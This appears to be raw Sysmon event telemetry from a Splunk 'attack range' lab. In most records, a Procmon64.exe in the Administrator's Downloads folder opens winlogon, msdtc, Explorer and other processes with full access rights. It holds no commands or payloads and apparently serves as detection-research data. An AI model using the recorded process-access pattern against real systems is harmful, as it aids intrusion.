10:55:47.165{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AA-6215-B200-000000003802}2320C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:47.149{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F1AB-6215-8500-000000003802}2868C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:47.046{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F1AB-6215-8500-000000003802}2868C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:47.043{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F144-6215-7700-000000003802}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.995{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F144-6215-7700-000000003802}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.995{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217526Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:48.535{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B18F3B87660EB4907EA503411111A501,SHA256=A2060F9290CAE0DC447ED047916CEA2D33454768428437AA074493989601EFC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:48.951{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:48.949{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2BB-6215-C800-000000003802}1332C:\Program Files\TightVNC\tvnserver.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:48.898{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2BB-6215-C800-000000003802}1332C:\Program Files\TightVNC\tvnserver.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:48.882{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:48.567{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:48.567{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:48.413{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:48.413{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:48.229{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AB7D50E157507F4F62E356B03095498,SHA256=741FAE34BD820E381348AAB98AC3490AD6283F832DF46118DFB78FC0773483DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217525Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:48.254{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=124BF06C8DC6BF104046A9670C429662,SHA256=8178F6063F12B62CE53FD9F56D60C528B7CC65DA4E220DF952BEA8AC1320C376,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217524Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:45.544{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51399-false10.0.1.12-8089- 10341000x8000000000000000289743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:47.998{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217555Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.863{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-12B5-6216-7F04-000000003902}3424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217554Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217553Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217552Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217551Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217550Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217549Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217548Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217547Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217546Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.863{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217545Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.863{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-12B5-6216-7F04-000000003902}3424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217544Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.863{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-12B5-6216-7F04-000000003902}3424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217543Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:49.864{4F8D34B0-12B5-6216-7F04-000000003902}3424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 